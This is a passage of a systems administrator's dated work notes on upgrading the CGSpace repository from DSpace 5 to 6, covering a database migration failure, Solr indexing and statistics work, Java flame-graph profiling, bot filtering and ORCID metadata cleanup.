+        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:576)
+        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:221)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+Caused by: org.flywaydb.core.internal.dbsupport.FlywaySqlScriptException:
+Migration V6.0_2015.03.07__DS-2701_Hibernate_migration.sql failed
+-----------------------------------------------------------------
+SQL State  : 2BP01
+Error Code : 0
+Message    : ERROR: cannot drop table metadatavalue column resource_id because other objects depend on it
+  Detail: view eperson_metadata depends on table metadatavalue column resource_id
+  Hint: Use DROP ... CASCADE to drop the dependent objects too.
+Location   : org/dspace/storage/rdbms/sqlmigration/postgres/V6.0_2015.03.07__DS-2701_Hibernate_migration.sql (/home/aorth/src/git/DSpace-6.3/file:/home/aorth/dspace63/lib/dspace-api-6.3.jar!/org/dspace/storage/rdbms/sqlmigration/postgres/V6.0_2015.03.07__DS-2701_Hibernate_migration.sql)
+Line       : 391
+Statement  : ALTER TABLE metadatavalue DROP COLUMN IF EXISTS resource_id
+
+        at org.flywaydb.core.internal.dbsupport.SqlScript.execute(SqlScript.java:117)
+        at org.flywaydb.core.internal.resolver.sql.SqlMigrationExecutor.execute(SqlMigrationExecutor.java:71)
+        at org.flywaydb.core.internal.command.DbMigrate.doMigrate(DbMigrate.java:352)
+        at org.flywaydb.core.internal.command.DbMigrate.access$1100(DbMigrate.java:47)
+        at org.flywaydb.core.internal.command.DbMigrate$4.doInTransaction(DbMigrate.java:308)
+        at org.flywaydb.core.internal.util.jdbc.TransactionTemplate.execute(TransactionTemplate.java:72)
+        at org.flywaydb.core.internal.command.DbMigrate.applyMigration(DbMigrate.java:305)
+        at org.flywaydb.core.internal.command.DbMigrate.access$1000(DbMigrate.java:47)
+        at org.flywaydb.core.internal.command.DbMigrate$2.doInTransaction(DbMigrate.java:230)
+        at org.flywaydb.core.internal.command.DbMigrate$2.doInTransaction(DbMigrate.java:173)
+        at org.flywaydb.core.internal.util.jdbc.TransactionTemplate.execute(TransactionTemplate.java:72)
+        at org.flywaydb.core.internal.command.DbMigrate.migrate(DbMigrate.java:173)
+        at org.flywaydb.core.Flyway$1.execute(Flyway.java:959)
+        at org.flywaydb.core.Flyway$1.execute(Flyway.java:917)
+        at org.flywaydb.core.Flyway.execute(Flyway.java:1373)
+        at org.flywaydb.core.Flyway.migrate(Flyway.java:917)
+        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:662)
+        ... 8 more
+Caused by: org.postgresql.util.PSQLException: ERROR: cannot drop table metadatavalue column resource_id because other objects depend on it
+  Detail: view eperson_metadata depends on table metadatavalue column resource_id
+  Hint: Use DROP ... CASCADE to drop the dependent objects too.
+        at org.postgresql.core.v3.QueryExecutorImpl.receiveErrorResponse(QueryExecutorImpl.java:2422)
+        at org.postgresql.core.v3.QueryExecutorImpl.processResults(QueryExecutorImpl.java:2167)
+        at org.postgresql.core.v3.QueryExecutorImpl.execute(QueryExecutorImpl.java:306)
+        at org.postgresql.jdbc.PgStatement.executeInternal(PgStatement.java:441)
+        at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:365)
+        at org.postgresql.jdbc.PgStatement.executeWithFlags(PgStatement.java:307)
+        at org.postgresql.jdbc.PgStatement.executeCachedSql(PgStatement.java:293)
+        at org.postgresql.jdbc.PgStatement.executeWithFlags(PgStatement.java:270)
+        at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:266)
+        at org.apache.commons.dbcp2.DelegatingStatement.execute(DelegatingStatement.java:291)
+        at org.apache.commons.dbcp2.DelegatingStatement.execute(DelegatingStatement.java:291)
+        at org.flywaydb.core.internal.dbsupport.JdbcTemplate.executeStatement(JdbcTemplate.java:238)
+        at org.flywaydb.core.internal.dbsupport.SqlScript.execute(SqlScript.java:114)
+        ... 24 more
+</code></pre><ul>
+<li>I think I might need to update the sequences first&hellip; nope</li>
+<li>Perhaps it&rsquo;s due to some missing bitstream IDs and I need to run <code>dspace cleanup</code> on CGSpace and take a new PostgreSQL dump&hellip; nope</li>
+<li>A thread on the dspace-tech mailing list regarding this migration noticed that his database had some views created that were using the <code>resource_id</code> column</li>
+<li>Our database had the same issue, where the <code>eperson_metadata</code> view was created by something (Atmire module?) but has no references in the vanilla DSpace code, so I dropped it and tried the migration again:</li>
+</ul>
+<pre tabindex="0"><code>dspace63=# DROP VIEW eperson_metadata;
+DROP VIEW
+</code></pre><ul>
+<li>After that the migration was successful and DSpace starts up successfully and begins indexing
+<ul>
+<li>xmlui, solr, jspui, rest, and oai are working (rest was redirecting to HTTPS, so I set the Tomcat connector to <code>secure=&quot;true&quot;</code> and it fixed it on localhost, but caused other issues so I disabled it for now)</li>
+<li>I started diffing our themes against the Mirage 2 reference theme to capture the latest changes</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-02-03">2020-02-03</h2>
+<ul>
+<li>Update DSpace mimetype fallback images from <a href="https://github.com/KDE/breeze-icons">KDE Breeze Icons</a> project
+<ul>
+<li>Our icons are four years old (see <a href="https://alanorth.github.io/dspace-bitstream-icons/">my bitstream icons demo</a>)</li>
+</ul>
+</li>
+<li>Issues remaining in the DSpace 6 port of our CGSpace 5.x code:
+<ul>
+<li><input checked="" disabled="" type="checkbox"> Community and collection pages only show one recent submission (seems that there is only one item in Solr?)</li>
+<li><input checked="" disabled="" type="checkbox"> Community and collection pages have tons of &ldquo;Browse&rdquo; buttons that we need to remove</li>
+<li><input checked="" disabled="" type="checkbox"> Order of navigation elements in right side bar (&ldquo;My Account&rdquo; etc, compare to DSpace Test)</li>
+<li><input disabled="" type="checkbox"> Home page trail says &ldquo;CGSpace Home&rdquo; instead of &ldquo;CGSpace Home / Community List&rdquo; (see DSpace Test)</li>
+</ul>
+</li>
+<li>There are lots of errors in the DSpace log, which might explain some of the issues with recent submissions / Solr:</li>
+</ul>
+<pre tabindex="0"><code>2020-02-03 10:27:14,485 ERROR org.dspace.browse.ItemCountDAOSolr @ caught exception: 
+org.dspace.discovery.SearchServiceException: Invalid UUID string: 1
+2020-02-03 13:20:20,475 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractRecentSubmissionTransformer @ Caught SearchServiceException while retrieving recent submission for: home page
+org.dspace.discovery.SearchServiceException: Invalid UUID string: 111210
+</code></pre><ul>
+<li>If I look in Solr&rsquo;s search core I do actually see items with integers for their resource ID, which I think are all supposed to be UUIDs now&hellip;</li>
+<li>I dropped all the documents in the search core:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8080/solr/search/update?stream.body=&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&amp;commit=true&#39;
+</code></pre><ul>
+<li>Still didn&rsquo;t work, so I&rsquo;m going to try a clean database import and migration:</li>
+</ul>
+<pre tabindex="0"><code>$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspace63
+$ psql -h localhost -U postgres -c &#39;alter user dspacetest superuser;&#39;
+$ pg_restore -h localhost -U postgres -d dspace63 -O --role=dspacetest -h localhost dspace_2020-01-27.backup
+$ psql -h localhost -U postgres -c &#39;alter user dspacetest nosuperuser;&#39;
+$ psql -h localhost -U postgres dspace63                               
+dspace63=# CREATE EXTENSION pgcrypto;
+dspace63=# DELETE FROM schema_version WHERE version IN (&#39;5.0.2015.01.27&#39;, &#39;5.6.2015.12.03.2&#39;, &#39;5.6.2016.08.08&#39;, &#39;5.0.2017.04.28&#39;, &#39;5.0.2017.09.25&#39;, &#39;5.8.2015.12.03.3&#39;);
+dspace63=# DROP VIEW eperson_metadata;
+dspace63=# \q
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace63
+$ ~/dspace63/bin/dspace database migrate
+</code></pre><ul>
+<li>I notice that the indexing doesn&rsquo;t work correctly if I start it manually with <code>dspace index-discovery -b</code> (search.resourceid becomes an integer!)
+<ul>
+<li>If I induce an indexing by touching <code>dspace/solr/search/conf/reindex.flag</code> the search.resourceid are all UUIDs&hellip;</li>
+</ul>
+</li>
+<li>Speaking of database stuff, there was a performance-related update for the <a href="https://github.com/DSpace/DSpace/pull/1791/">indexes that we used in DSpace 5</a>
+<ul>
+<li>We might want to <a href="https://github.com/DSpace/DSpace/pull/1792">apply it in DSpace 6</a>, as it was never merged to 6.x, but it helped with the performance of <code>/submissions</code> in XMLUI for us in <a href="/cgspace-notes/2018-03/">2018-03</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-02-04">2020-02-04</h2>
+<ul>
+<li>The indexing issue I was having yesterday seems to only present itself the first time a new installation is running DSpace 6
+<ul>
+<li>Once the indexing induced by touching <code>dspace/solr/search/conf/reindex.flag</code> has finished, subsequent manual invocations of <code>dspace index-discovery -b</code> work as expected</li>
+<li>Nevertheless, I sent a message to the dspace-tech mailing list describing the issue to see if anyone has any comments</li>
+</ul>
+</li>
+<li>I am seeing that the number of important commits on the unreleased DSpace 6.4 are really numerous and it might be better for us to target that version
+<ul>
+<li>I did a simple test and it&rsquo;s easy to rebase my current 6.3 branch on top of the upstream <code>dspace-6_x</code> branch:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ git checkout -b 6_x-dev64 6_x-dev
+$ git rebase -i upstream/dspace-6_x
+</code></pre><ul>
+<li>I finally understand why our themes show all the &ldquo;Browse by&rdquo; buttons on community and collection pages in DSpace 6.x
+<ul>
+<li>The code in <code>./dspace-xmlui/src/main/java/org/dspace/app/xmlui/aspect/browseArtifacts/CommunityBrowse.java</code> iterates over all the browse indexes and prints them when it is called</li>
+<li>The XMLUI theme code in <code>dspace/modules/xmlui-mirage2/src/main/webapp/themes/0_CGIAR/xsl/preprocess/browse.xsl</code> calls the template because the id of the div matches &ldquo;aspect.browseArtifacts.CommunityBrowse.list.community-browse&rdquo;</li>
+<li>I checked the DRI of a community page on my local 6.x and DSpace Test 5.x by appending <code>?XML</code> to the URL and I see the ID is missing on DSpace 5.x</li>
+<li>The issue is the same with the ordering of the &ldquo;My Account&rdquo; link, but in Navigation.java</li>
+<li>I tried modifying <code>preprocess/browse.xsl</code> but it always ends up printing some default list of browse by links&hellip;</li>
+<li>I&rsquo;m starting to wonder if Atmire&rsquo;s modules somehow override this, as I don&rsquo;t see how <code>CommunityBrowse.java</code> can behave like ours on DSpace 5.x unless they have overridden it (as the open source code is the same in 5.x and 6.x)</li>
+<li>At least the &ldquo;account&rdquo; link in the sidebar is overridden in our 5.x branch because Atmire copied a modified <code>Navigation.java</code> to the local xmlui modules folder&hellip; so that explains that (and it&rsquo;s easy to replicate in 6.x)</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-02-05">2020-02-05</h2>
+<ul>
+<li>UptimeRobot told me that AReS Explorer crashed last night, so I logged into it, ran all updates, and rebooted it</li>
+<li>Testing Discovery indexing speed on my local DSpace 6.3:</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -D -e ~/dspace63/bin/dspace index-discovery -b
+schedtool -D -e ~/dspace63/bin/dspace index-discovery -b  3771.78s user 93.63s system 41% cpu 2:34:19.53 total
+schedtool -D -e ~/dspace63/bin/dspace index-discovery -b  3360.28s user 82.63s system 38% cpu 2:30:22.07 total
+schedtool -D -e ~/dspace63/bin/dspace index-discovery -b  4678.72s user 138.87s system 42% cpu 3:08:35.72 total
+schedtool -D -e ~/dspace63/bin/dspace index-discovery -b  3334.19s user 86.54s system 35% cpu 2:41:56.73 total
+</code></pre><ul>
+<li>DSpace 5.8 was taking about 1 hour (or less on this laptop), so this is 2-3 times longer!</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -D -e ~/dspace/bin/dspace index-discovery -b
+schedtool -D -e ~/dspace/bin/dspace index-discovery -b  299.53s user 69.67s system 20% cpu 30:34.47 total
+schedtool -D -e ~/dspace/bin/dspace index-discovery -b  270.31s user 69.88s system 19% cpu 29:01.38 total
+</code></pre><ul>
+<li>Checking out the DSpace 6.x REST API query client
+<ul>
+<li>There is a <a href="https://terrywbrady.github.io/restReportTutorial/intro">tutorial</a> that explains how it works and I see it is very powerful because you can export a CSV of results in order to fix and re-upload them with batch import!</li>
+<li>Custom queries can be added in <code>dspace-rest/src/main/webapp/static/reports/restQueryReport.js</code></li>
+</ul>
+</li>
+<li>I noticed two new bots in the logs with the following user agents:
+<ul>
+<li><code>Jersey/2.6 (HttpUrlConnection 1.8.0_152)</code></li>
+<li><code>magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)</code></li>
+</ul>
+</li>
+<li>I filed an <a href="https://github.com/atmire/COUNTER-Robots/issues/30">issue to add Jersey to the COUNTER-Robots</a> list</li>
+<li>Peter noticed that the statlets on community, collection, and item pages aren&rsquo;t working on CGSpace
+<ul>
+<li>I thought it might be related to the fact that the yearly sharding didn&rsquo;t complete successfully this year so the <code>statistics-2019</code> core is empty</li>
+<li>I removed the <code>statistics-2019</code> core and had to restart Tomcat like six times before all cores would load properly (ugh!!!!)</li>
+<li>After that the statlets were working properly&hellip;</li>
+</ul>
+</li>
+<li>Run all system updates on DSpace Test (linode19) and restart it</li>
+</ul>
+<h2 id="2020-02-06">2020-02-06</h2>
+<ul>
+<li>I sent a mail to the dspace-tech mailing list asking about slow Discovery indexing speed in DSpace 6</li>
+<li>I destroyed my PostgreSQL 9.6 containers and re-created them using PostgreSQL 10 to see if there are any speedups with DSpace 6.x:</li>
+</ul>
+<pre tabindex="0"><code>$ podman pull postgres:10-alpine
+$ podman run --name dspacedb10 -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:10-alpine
+$ createuser -h localhost -U postgres --pwprompt dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspace63
+$ psql -h localhost -U postgres -c &#39;alter user dspacetest superuser;&#39;
+$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2020-02-06.backup
+$ pg_restore -h localhost -U postgres -d dspace63 -O --role=dspacetest -h localhost ~/Downloads/cgspace_2020-02-06.backup
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace63
+$ psql -h localhost -U postgres -c &#39;alter user dspacetest nosuperuser;&#39;
+$ psql -h localhost -U postgres dspace63                               
+dspace63=# CREATE EXTENSION pgcrypto;
+dspace63=# DELETE FROM schema_version WHERE version IN (&#39;5.0.2015.01.27&#39;, &#39;5.6.2015.12.03.2&#39;, &#39;5.6.2016.08.08&#39;, &#39;5.0.2017.04.28&#39;, &#39;5.0.2017.09.25&#39;, &#39;5.8.2015.12.03.3&#39;);
+dspace63=# DROP VIEW eperson_metadata;
+dspace63=# \q
+</code></pre><ul>
+<li>I purged ~33,000 hits from the &ldquo;Jersey/2.6&rdquo; bot in CGSpace&rsquo;s statistics using my <code>check-spider-hits.sh</code> script:</li>
+</ul>
+<pre tabindex="0"><code>$ ./check-spider-hits.sh -d -p -f /tmp/jersey -s statistics -u http://localhost:8081/solr
+$ for year in 2018 2017 2016 2015; do ./check-spider-hits.sh -d -p -f /tmp/jersey -s &#34;statistics-${year}&#34; -u http://localhost:8081/solr; done
+</code></pre><ul>
+<li>I noticed another user agen in the logs that we should add to the list:</li>
+</ul>
+<pre tabindex="0"><code>ReactorNetty/0.9.2.RELEASE
+</code></pre><ul>
+<li>I made <a href="https://github.com/atmire/COUNTER-Robots/issues/31">an issue on the COUNTER-Robots repository</a></li>
+<li>I found a <a href="https://github.com/freedev/solr-import-export-json">nice tool for exporting and importing Solr records</a> and it seems to work for exporting our 2019 stats from the large statistics core!</li>
+</ul>
+<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01.json -f &#39;dateYearMonth:2019-01&#39; -k uid
+$ ls -lh /tmp/statistics-2019-01.json
+-rw-rw-r-- 1 aorth aorth 3.7G Feb  6 09:26 /tmp/statistics-2019-01.json
+</code></pre><ul>
+<li>Then I tested importing this by creating a new core in my development environment:</li>
+</ul>
+<pre tabindex="0"><code>$ curl &#39;http://localhost:8080/solr/admin/cores?action=CREATE&amp;name=statistics-2019&amp;instanceDir=/home/aorth/dspace/solr/statistics&amp;dataDir=/home/aorth/dspace/solr/statistics-2019/data&#39;
+$ ./run.sh -s http://localhost:8080/solr/statistics-2019 -a import -o ~/Downloads/statistics-2019-01.json -k uid
+</code></pre><ul>
+<li>This imports the records into the core, but DSpace can&rsquo;t see them, and when I restart Tomcat the core is not seen by Solr&hellip;</li>
+<li>I got the core to load by adding it to <code>dspace/solr/solr.xml</code> manually, ie:</li>
+</ul>
+<pre tabindex="0"><code>  &lt;cores adminPath=&#34;/admin/cores&#34;&gt;
+  ...
+    &lt;core name=&#34;statistics&#34; instanceDir=&#34;statistics&#34; /&gt;
+    &lt;core name=&#34;statistics-2019&#34; instanceDir=&#34;statistics&#34;&gt;
+        &lt;property name=&#34;dataDir&#34; value=&#34;/home/aorth/dspace/solr/statistics-2019/data&#34; /&gt;
+    &lt;/core&gt;
+  ...
+  &lt;/cores&gt;
+</code></pre><ul>
+<li>But I don&rsquo;t like having to do that&hellip; why doesn&rsquo;t it load automatically?</li>
+<li>I sent a mail to the dspace-tech mailing list to ask about it</li>
+<li>Just for fun I tried to load these stats into a Solr 7.7.2 instance using the DSpace 7 solr config:</li>
+<li>First, create a Solr statistics core using the DSpace 7 config:</li>
+</ul>
+<pre tabindex="0"><code>$ ./bin/solr create_core -c statistics -d ~/src/git/DSpace/dspace/solr/statistics/conf -p 8983
+</code></pre><ul>
+<li>Then try to import the stats, skipping a shitload of fields that are apparently added to our Solr statistics by Atmire modules:</li>
+</ul>
+<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8983/solr/statistics -a import -o ~/Downloads/statistics-2019-01.json -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
+</code></pre><ul>
+<li>OK that imported! I wonder if it works&hellip; maybe I&rsquo;ll try another day</li>
+</ul>
+<h2 id="2020-02-07">2020-02-07</h2>
+<ul>
+<li>I did some investigation into DSpace indexing performance using flame graphs
+<ul>
+<li>Excellent introduction: <a href="http://www.brendangregg.com/flamegraphs.html">http://www.brendangregg.com/flamegraphs.html</a></li>
+<li>Using flame graphs with java: <a href="https://netflixtechblog.com/java-in-flames-e763b3d32166">https://netflixtechblog.com/java-in-flames-e763b3d32166</a></li>
+<li>Fantastic wrapper scripts for doing perf on Java processes: <a href="https://github.com/jvm-profiling-tools/perf-map-agent">https://github.com/jvm-profiling-tools/perf-map-agent</a></li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ cd ~/src/git/perf-map-agent
+$ cmake     .
+$ make
+$ ./bin/create-links-in ~/.local/bin
+$ export FLAMEGRAPH_DIR=/home/aorth/src/git/FlameGraph
+$ export JAVA_HOME=/usr/lib/jvm/java-8-openjdk
+$ export JAVA_OPTS=&#34;-XX:+PreserveFramePointer&#34;
+$ ~/dspace63/bin/dspace index-discovery -b &amp;
+# pid of tomcat java process
+$ perf-java-flames 4478
+# pid of java indexing process
+$ perf-java-flames 11359
+</code></pre><ul>
+<li>All Java processes need to have <code>-XX:+PreserveFramePointer</code> if you want to trace their methods</li>
+<li>I did the same tests against DSpace 5.8 and 6.4-SNAPSHOT&rsquo;s CLI indexing process and Tomcat process
+<ul>
+<li>For what it&rsquo;s worth, it appears all the Hibernate stuff is in the CLI processes, so we don&rsquo;t need to trace the Tomcat process</li>
+</ul>
+</li>
+<li>Here is the flame graph for DSpace 5.8&rsquo;s <code>dspace index-discovery -b</code> java process:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/02/flamegraph-java-cli-dspace58.svg" alt="DSpace 5.8 index-discovery flame graph"></p>
+<ul>
+<li>Here is the flame graph for DSpace 6.4-SNAPSHOT&rsquo;s <code>dspace index-discovery -b</code> java process:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/02/flamegraph-java-cli-dspace64-snapshot.svg" alt="DSpace 6.4-SNAPSHOT index-discovery flame graph"></p>
+<ul>
+<li>If the width of the stacks indicates time, then it&rsquo;s clear that Hibernate takes longer&hellip;</li>
+<li>Apparently there is a &ldquo;flame diff&rdquo; tool, I wonder if we can use that to compare!</li>
+</ul>
+<h2 id="2020-02-09">2020-02-09</h2>
+<ul>
+<li>This weekend I did a lot more testing of indexing performance with our DSpace 5.8 branch, vanilla DSpace 5.10, and vanilla DSpace 6.4-SNAPSHOT:</li>
+</ul>
+<pre tabindex="0"><code># CGSpace 5.8
+schedtool -D -e ~/dspace/bin/dspace index-discovery -b  385.72s user 131.16s system 19% cpu 43:21.18 total
+schedtool -D -e ~/dspace/bin/dspace index-discovery -b  382.95s user 127.31s system 20% cpu 42:10.07 total
+schedtool -D -e ~/dspace/bin/dspace index-discovery -b  368.56s user 143.97s system 20% cpu 42:22.66 total
+schedtool -D -e ~/dspace/bin/dspace index-discovery -b  360.09s user 104.03s system 19% cpu 39:24.41 total
+
+# Vanilla DSpace 5.10
+schedtool -D -e ~/dspace510/bin/dspace index-discovery -b  236.19s user 59.70s system 3% cpu 2:03:31.14 total
+schedtool -D -e ~/dspace510/bin/dspace index-discovery -b  232.41s user 50.38s system 3% cpu 2:04:16.00 total
+
+# Vanilla DSpace 6.4-SNAPSHOT
+schedtool -D -e ~/dspace63/bin/dspace index-discovery -b  5112.96s user 127.80s system 40% cpu 3:36:53.98 total
+schedtool -D -e ~/dspace63/bin/dspace index-discovery -b  5112.96s user 127.80s system 40% cpu 3:21:0.0 total
+</code></pre><ul>
+<li>I generated better flame graphs for the DSpace indexing process by using <code>perf-record-stack</code> and filtering out the java process:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_HOME=/usr/lib/jvm/java-8-openjdk
+$ export PERF_RECORD_SECONDS=60
+$ export JAVA_OPTS=&#34;-XX:+PreserveFramePointer&#34;
+$ time schedtool -D -e ~/dspace/bin/dspace index-discovery -b &amp;
+# process id of java indexing process (not Tomcat)
+$ perf-java-record-stack 169639
+$ sudo perf script -i /tmp/perf-169639.data &gt; out.dspace510-1
+$ cat out.dspace510-1 | ../FlameGraph/stackcollapse-perf.pl | grep -E &#39;^java&#39; | ../FlameGraph/flamegraph.pl --color=java --hash &gt; out.dspace510-1.svg
+</code></pre><ul>
+<li>All data recorded on my laptop with the same kernel, same boot, etc.</li>
+<li>CGSpace 5.8 (with Atmire patches):</li>
+</ul>
+<p><img src="/cgspace-notes/2020/02/out.dspace58-2.svg" alt="DSpace 5.8 (with Atmire modules) index-discovery flame graph"></p>
+<ul>
+<li>Vanilla DSpace 5.10:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/02/out.dspace510-3.svg" alt="Vanilla DSpace 5.10 index-discovery flame graph"></p>
+<ul>
+<li>Vanilla DSpace 6.4-SNAPSHOT:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/02/out.dspace64-3.svg" alt="Vanilla DSpace 6.4-SNAPSHOT index-discovery flame graph"></p>
+<ul>
+<li>I sent my feedback to the dspace-tech mailing list so someone can hopefully comment.</li>
+<li>Last week Peter asked Sisay to upload some items to CGSpace in the GENNOVATE collection (part of Gender CRP)
+<ul>
+<li>He uploaded them here: <a href="https://cgspace.cgiar.org/handle/10568/105926">https://cgspace.cgiar.org/handle/10568/105926</a></li>
+<li>On a whim I checked and found five duplicates there, which means Sisay didn&rsquo;t even check</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-02-10">2020-02-10</h2>
+<ul>
+<li>Follow up with <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=706">Atmire about DSpace 6.x upgrade</a>
+<ul>
+<li>I raised the issue of targetting 6.4-SNAPSHOT as well as the Discovery indexing performance issues in 6.x</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-02-11">2020-02-11</h2>
+<ul>
+<li>Maria from Bioversity asked me to add some ORCID iDs to our controlled vocabulary so I combined them with our existing ones and updated the names from the ORCID API:</li>
+</ul>
+<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2020-02-11-combined-orcids.txt
+$ ./resolve-orcids.py -i /tmp/2020-02-11-combined-orcids.txt -o /tmp/2020-02-11-combined-names.txt -d
+# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+</code></pre><ul>
+<li>Then I noticed some author names had changed, so I captured the old and new names in a CSV file and fixed them using <code>fix-metadata-values.py</code>:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-02-11-correct-orcid-ids.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.creator.id -t correct -m 240 -d
+</code></pre><ul>
+<li>On a hunch I decided to try to add these ORCID iDs to existing items that might not have them yet
+<ul>
+<li>I checked the database for likely matches to the author name and then created a CSV with the author names and ORCID iDs:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
+&#34;Staver, Charles&#34;,charles staver: 0000-0002-4532-6077
+&#34;Staver, C.&#34;,charles staver: 0000-0002-4532-6077
+&#34;Fungo, R.&#34;,Robert Fungo: 0000-0002-4264-6905
+&#34;Remans, R.&#34;,Roseline Remans: 0000-0003-3659-8529
+&#34;Remans, Roseline&#34;,Roseline Remans: 0000-0003-3659-8529
+&#34;Rietveld A.&#34;,Anne Rietveld: 0000-0002-9400-9473
+&#34;Rietveld, A.&#34;,Anne Rietveld: 0000-0002-9400-9473
+&#34;Rietveld, A.M.&#34;,Anne Rietveld: 0000-0002-9400-9473
+&#34;Rietveld, Anne M.&#34;,Anne Rietveld: 0000-0002-9400-9473
+&#34;Fongar, A.&#34;,Andrea Fongar: 0000-0003-2084-1571
+&#34;Müller, Anna&#34;,Anna Müller: 0000-0003-3120-8560
+&#34;Müller, A.&#34;,Anna Müller: 0000-0003-3120-8560
+</code></pre><ul>
+<li>Running the <code>add-orcid-identifiers-csv.py</code> script I added 144 ORCID iDs to items on CGSpace!</li>
+</ul>
+<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i /tmp/2020-02-11-add-orcid-ids.csv -db dspace -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>Minor updates to all Python utility scripts in the CGSpace git repository</li>
+<li>Update the spider agent patterns in CGSpace <code>5_x-prod</code> branch from the latest <a href="https://github.com/atmire/COUNTER-Robots">COUNTER-Robots</a> project
+<ul>
+<li>I ran the <code>check-spider-hits.sh</code> script with the updated file and purged 6,000 hits from our Solr statistics core on CGSpace</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-02-12">2020-02-12</h2>
+<ul>
+<li>Follow up with people about AReS funding for next phase</li>
+<li>Peter asked about the &ldquo;stats&rdquo; and &ldquo;summary&rdquo; reports that he had requested in December
+<ul>
+<li>I opened a <a href="https://github.com/ilri/AReS/issues/13">new issue on AReS for the &ldquo;summary&rdquo; report</a></li>
+</ul>
+</li>
+<li>Peter asked me to update John McIntire&rsquo;s name format on CGSpace so I ran the following PostgreSQL query:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=&#39;McIntire, John M.&#39; WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value=&#39;McIntire, John&#39;;
+UPDATE 26
+</code></pre><h2 id="2020-02-17">2020-02-17</h2>
+<ul>
+<li>A few days ago Atmire responded to my question about DSpace 6.4-SNAPSHOT saying that they can only confirm that 6.3 works with their modules
+<ul>
+<li>I responded to say that we agree to target 6.3, but that I will cherry-pick important patches from the <code>dspace-6_x</code> branch at our own responsibility</li>
+</ul>
+</li>
+<li>Send a message to dspace-devel asking them to tag DSpace 6.4</li>
+<li>Udana from IWMI asked about the OAI base URL for their community on CGSpace
+<ul>
+<li>I think it should be this: <a href="https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;metadataPrefix=oai_dc&amp;set=com_10568_16814">https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;metadataPrefix=oai_dc&amp;set=com_10568_16814</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-02-19">2020-02-19</h2>
+<ul>
+<li>I noticed a thread on the mailing list about the Tomcat header size and Solr max boolean clauses error
+<ul>
